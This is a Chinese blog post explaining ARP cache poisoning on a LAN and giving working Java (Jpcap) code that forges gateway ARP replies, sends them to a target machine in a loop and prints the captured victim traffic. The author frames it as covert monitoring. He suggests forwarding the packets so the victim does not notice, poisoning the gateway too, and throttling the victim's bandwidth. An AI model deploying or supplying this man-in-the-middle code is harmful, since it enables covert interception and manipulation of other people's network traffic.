`
lzj0470
  • 浏览: 1273197 次
  • 性别: Icon_minigender_1
  • 来自: 深圳
社区版块
存档分类
最新评论

JAVA实现ARP欺骗性的数据封包监听

阅读更多
ARP(Address Resolution Protocol)既地址解释协议,主要的目的是用于进行IP和MAC地址解释的。IP是网络层协议,而MAC是被数据链路层使用。网络中两个节点要进行通信,那么首先发送端必须要知道源和目的地的MAC地址,而网络层是使用IP地址,所以要获得MAC地址,就必须通过IP地址获取对应的MAC地址,这样就需要使用ARP协议将IP地址转换为MAC地址,而同时为了能够快速的找到目的地的MAC地址,每个节点都会有一个ARP缓存,用于保存已经转好好的MAC地址,大家可以在控制台下使用arp –a指令查看arp缓存表。

      而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP表中是否存在对应的IP地址,如果没有,则发送一个ARP广播,当某一个拥有这个MAC地址的节点收到ARP请求的时候,会创建一个ARP reply包,并发送到ARP请求的源节点,ARP Reply包中就包含了目的地节点的MAC地址,在源节点接受到这个reply后,会将目的地节点的MAC地址保存在ARP缓存表中,下一次再次请求同一 IP地址的时候,系统将会从ARP表中直接获取目的地MAC地址,而不需要再次发送ARP广播。

      看到这里,ARP的具体过程大概讲解了一遍,希望能够解释清楚。相信有心的朋友一定已经开始考虑ARP欺骗的原理了吧,其实就是利用ARP表进行ARP欺骗,比如一台局域网内的机器A,通过网关B进行internet连接,而它的arp表中保存着网关B的IP和MAC地址对,如下:

192.168.1.1    —>    MAC1(懒得写那么长了,就以MAC1作为MAC地址了)

那么也就是说,当A想上网的时候,他所有的数据都将先发送到网关再由网关转发出去,那么A的数据首先会通过192.168.1.1找到网关的MAC地址 MAC1,然后就可把数据发送到网关了。此时你的机器是C,MAC地址是MAC2,你想通过ARP欺骗来获取A传输的数据,那么你所需要做的事情其实很简单,就是将机器A的ARP表中192.168.1.1对应的MAC地址MAC1改成MAC2即可,这样子机器A所有发送到192.168.1.1的数据就会发到MAC地址为MAC2的机器上,也就是你的机器上了。

要更改APR表的记录,办法就是伪造一个ARP reply包发送给机器A,而这个ARP reply包中的源IP为192.168.1.1,MAC地址为MAC2既你的机器的MAC地址即可,机器A接受到后就会将这个源IP和MAC刷新到它的 ARP缓存表中,覆盖原有的记录,最终这样就可以达到ARP欺骗的目的了。

讲到这里不知道大家是否对ARP欺骗有所了解呢?如果再不了解那就上网搜搜吧,网上很多相关的资料。好了,原理讲完了,那就轮到实现了,通过JAVA又如何实现ARP欺骗呢?

从头到尾来做,当然不是我的作风,JAVA社区那么庞大,我么应该好好利用,要站在巨人的肩膀上成功嘛,呵呵。有一个开源项目JPCAP,这个项目提供一个中间层接口让使用者可以调用如wincap/libpcap这些库对网络传输进行控制,具体可到官方网站查看其文档。

在这里,我实现了一个简单的封包截取程序,根据ARP欺骗的原理,我们所需要做的事情如下:
1、 构建一个ARP Reply包

2、 将该封包发送到需要欺骗的机器
public class LocalListener {


    private final static String GATE_IP = "192.168.11.1";
  private final static byte[] GATE_MAC = {0x00, 0x0a, (byte) 0xc5, 
0x42, 0x6e, (byte) 0x9a};
    private JpcapCaptor jpcap;//与设备的连接
    private JpcapSender sender;  //用于发送的实例
    private Packet replyPacket;//ARP reply包
    private NetworkInterface device;//当前机器网卡设备
    private IpMacMap targetIpMacMap;//目的地IP MAC对


    public LocalListener(IpMacMap target) throws Exception {
        NetworkInterface[] devices =JpcapCaptor.getDeviceList();              
        device = devices[1];
        this.targetIpMacMap = target;
        initSender();
        initPacket();
    }


    private void initSender() throws Exception {
        jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000);    //打开与设备的连接
        jpcap.setFilter("ip", true);                                //只监听ip数据包
        sender = jpcap.getJpcapSenderInstance();
    }


    private void initPacket() throws Exception {
        //reply包的源IP和MAC地址,此IP-MAC对将会被映射到ARP表
        IpMacMap targetsSd = new IpMacMap(GATE_IP, device.mac_address); 
        //创建修改目标机器ARP的包
        replyPacket = ARPPacketGern.genPacket(targetIpMacMap, targetsSd);
        //创建以太网头信息,并打包进reply包
        replyPacket.datalink = EthernetPacketGern.genPacket(targetIpMacMap.getMac(),
                device.mac_address);
    }


    public void listen() throws InterruptedException{
        Thread t = new Thread(new Runnable() {
            public void run() {
              //发送reply封包,修改目的地arp表, arp表会在一段时间内被更新,所以需要不停发送
                while(true){
                    send(); 
                    try {
                        Thread.sleep(500);
                    } catch (InterruptedException ex) {
                        Logger.getLogger(LocalListener.class.getName()).log(Level.SEVERE, null, ex);
                    }
                }
            }
        });
        t.start();
        //截获当前网络设备的封包收发信息
        while(true){
            IPPacket ipPacket = (IPPacket)jpcap.getPacket();
            System.out.println(ipPacket);
        }
    }}





//IP-MAC实体,只用于保存一对IP-MAC地址
public class IpMacMap {
    private String ip;
    private byte[] mac;


    public IpMacMap(){
    }
   
    public IpMacMap(String ip, byte[] mac){
        this.ip = ip;
        this.mac = mac;
    }
   
    public String getIp() {
        return ip;
    }


    public void setIp(String ip) {
        this.ip = ip;
    }


    public byte[] getMac() {
        return mac;
    }


    public void setMac(byte[] mac) {
        this.mac = mac;
    } 
   
}


//ARP reply包生成类,用于根据目的地址和源地址生成reply包
public class ARPPacketGern{


    public static ARPPacket genPacket(IpMacMap target, IpMacMap sender) throws Exception{
        ARPPacket arpTarget = new ARPPacket();
        arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER;  //选择以太网类型(Ethernet)
        arpTarget.prototype = ARPPacket.PROTOTYPE_IP;        //选择IP网络协议类型
        arpTarget.operation = ARPPacket.ARP_REPLY;              //选择REPLY类型
        arpTarget.hlen = 6;                              //MAC地址长度固定6个字节
        arpTarget.plen = 4;                              //IP地址长度固定4个字节
        arpTarget.target_hardaddr = target.getMac();
        arpTarget.target_protoaddr = InetAddress.getByName(target.getIp()).getAddress();
        arpTarget.sender_hardaddr = sender.getMac();
        arpTarget.sender_protoaddr = InetAddress.getByName(sender.getIp()).getAddress();
        return arpTarget;
    }
}


//根据目的地MAC和源MAC构建以太网头信息,用于传输数据
public class EthernetPacketGern{
    public static EthernetPacket genPacket(byte[] targetMac, byte[] senderMac) throws Exception {
        EthernetPacket ethToTarget = new EthernetPacket();          //创建一个以太网头
        ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;  //选择以太包类型
        ethToTarget.dst_mac = targetMac;
        ethToTarget.src_mac = senderMac;       
        return ethToTarget;
    }
}

如上代码实现了创建一个发送到IP为192.168.11.4的机器的ARP reply封包,其中可看到,reply包中的源IP为192.168.11.1,而源MAC则被改成当前机器的MAC地址,既 device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新ARP表,并且所有发送往 192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中创建了一个线程用于循环发送reply封包,主要是因为ARP表会在一定时间内更新,所以要不停的发送才能保证其MAC地址时刻都是被改变的。同时主线程用于监听并打印当前设备的所有IP数据包信息,本来此方法只能监听到本机数据包的信息,但由于使用了ARP欺骗,所以你会在192.168.11.4发送数据到192.168.11.1的时候截获其数据包,并看到类似如下的信息:

1216798614:885583 /192.168.11.4->/61.135.189.33 protocol(6) priority(0) hop(128) offset(0) ident(34922) TCP 1337 > 8016 seq(1062321893) win(65535) S

    其实上例程序虽然可以截获并监听192.168.11.4的数据包,但是如果真的运行起来后,192.168.11.4的机器将会无法上网(假设该机器通过192.168.11.1作为网关上网),这又是为何呢?

    这就是因为本机截获了192.168.11.4的封包,但是却没有将封包转发出去,所以实际上数据包到了你的机器上后就被中断了,数据包无法发送出去。既然要监听对方机器,当然不能让对方知道啦,如果你监听了那台机器,却导致对方无法上网,傻子也知道有问题啦,所以以上程序仍然要加个补充,那就是将封包数据在转发到192.168.11.1上,只要将截获的封包再send出去就可以了,具体如何做就留给大家想吧,困了,休息了,如果有朋友有兴趣又实在想不出如何做的话,可以向我提出来,有必要的话,下次再贴一个完整点的例子吧。

    对了,最后还有补充的地方,那就是我们可以通过同样的方式刷新网关的ARP,这样网关接受到的数据也会被本机截获,同样再通过本机转发到目的机器即可。这样对方既可正常上网,而我们又可截获对方的数据包,如果要进行限速的话,那就是在截获封包的同时,进行一定的延时,比如一秒只允许多少K的数据通过,都可以在这里做手脚,同样的,具体如何留给大家想吧。
分享到:
评论

相关推荐

    Sniffer案例分析-ARP欺骗

    在网络安全领域,Sniffer(嗅探器)是一种用于网络数据包捕获的工具,它能够监控网络中的数据传输,帮助网络管理员检测...通过使用如Wireshark这样的工具,可以有效地检测和预防ARP欺骗,确保数据的完整性和安全性。

    arp欺骗 代码

    通过研究这个ARP欺骗代码,你可以深入了解网络层的安全问题,提升对网络安全的敏感性和防御能力。同时,这也是一种学习网络编程、网络嗅探和安全分析的好方法。在实践中,你可以结合Wireshark等工具,进行更深入的...

    win-ArpSpoofer:使用 libpcap 和 libnet 为 windows 用 C 语言制作的 Arp 欺骗器

    在Windows系统中,由于操作系统对网络底层操作的限制,实现ARP欺骗相对复杂,而win-ArpSpoofer通过libpcap捕获网络流量,利用libnet构造并发送欺骗性的ARP响应,从而控制网络流量的流向。 首先,我们来看libpcap的...

    arp数据包生成器

    5. **安全风险**:值得注意的是,尽管ARP数据包生成器在合法用途下很有价值,但如果不恰当使用,可能会被滥用于执行ARP欺骗攻击,导致数据泄露、网络中断等严重后果。 6. **使用技巧**:在使用ARP数据包生成器时,...

    JSP中用回车监听按钮事件兼容火狐 IE等主流浏览器

    5. **ARP欺骗和数据封包监听**:在更底层的网络编程中,Java可以通过套接字编程或第三方库(如Jpcap)来实现ARP欺骗和数据包捕获,这通常用于网络安全分析和网络嗅探。 总结起来,本文主要讨论了如何在JSP中使用...

    arp攻防系列之wireshark

    然而,ARP欺骗(ARP Spoofing)是一种常见的网络攻击手段,攻击者通过发送虚假的ARP消息,将目标设备的IP地址映射到错误的MAC地址,从而中间截取网络流量甚至实施DoS攻击。 Wireshark-win32-1.2.10.exe是Wireshark...

    WinPcap中文文档

    ARP欺骗可以导致数据包被重定向,使攻击者能监听或篡改网络通信,是网络嗅探和中间人攻击的一种手段。 3. **WinPcap编程教程**: "WinPcap编程渐进教程"这部分可能提供了逐步指导,教授读者如何使用WinPcap API来...

    《网络协议分析》-实训报告2022.docx

    此部分实验同样包括连通性检查,然后通过Kali Linux执行ARP欺骗,分析攻击成功与否的迹象。 三、Nmap信息搜集扫描实战 Nmap是一款网络扫描工具,常用于端口扫描、主机发现、服务识别和安全审计。在实训中,学生可能...

    wireshark安装包.zip

    10. **安全性**:Wireshark还用于网络安全审计,例如检测潜在的网络攻击,如ARP欺骗、DNS欺骗等。 对于初学者,1.4.1版本的PDF学习资料可能包含以下内容: - Wireshark的基础操作,如何启动和设置捕获选项。 - ...

    VC++网络程序设计

    2. **UDP(用户数据报协议)**:与TCP不同,UDP是无连接的,不保证数据包的顺序或完整性。这使得UDP在实时应用如视频流和在线游戏中更受欢迎,因为它提供了较低的延迟。使用Winsock库,开发者也能实现UDP通信。 3. ...

    密码学关于被动攻击的实验报告.pdf

    在本实验中,利用Wireshark进行网络嗅探,成功地展示了被动攻击的可能性,揭示了FTP登录信息的敏感性,并突显了网络保护和安全策略的重要性,例如加密通信、使用安全协议以及定期更新网络安全措施。

    密码学关于被动攻击的实验报告.docx

    【密码学】是信息安全领域的核心...因此,加强网络安全,如使用加密通信、实施ARP防欺骗策略、定期更换密码等措施,对于防范被动攻击至关重要。此外,了解和掌握这些攻击手段也有助于提升网络安全防护意识和技术水平。

    12.5 小结 - Wireshark 数据包分析实战(第 3 版) - 知乎书店1

    这种攻击允许攻击者通过篡改网络中的ARP缓存,将流量重定向到他们控制的机器,从而实现监听或修改数据。了解如何在Wireshark中检测和分析这种攻击,可以帮助防御者及时发现并阻止此类威胁。 此外,章节还涉及了如何...

    sniffer中文使用教程

    在安全方面,Sniffer可以帮助你检测网络中的嗅探攻击,如ARP欺骗、DNS欺骗等。通过分析数据包,你可以发现是否存在未授权的访问或数据泄露的情况。 在学习Sniffer的过程中,你需要理解网络协议的基础知识,如OSI七...

    常用网络工具_华为网络技术培训 经典中的经典

    10. **arp**:地址解析协议工具,用于查看和修改ARP缓存,帮助理解IP和MAC地址之间的关系,解决ARP欺骗等问题。 11. **ipconfig/ifconfig**:这两个命令分别在Windows和Linux系统中用于查看网络接口配置,包括IP...

Global site tag (gtag.js) - Google Analytics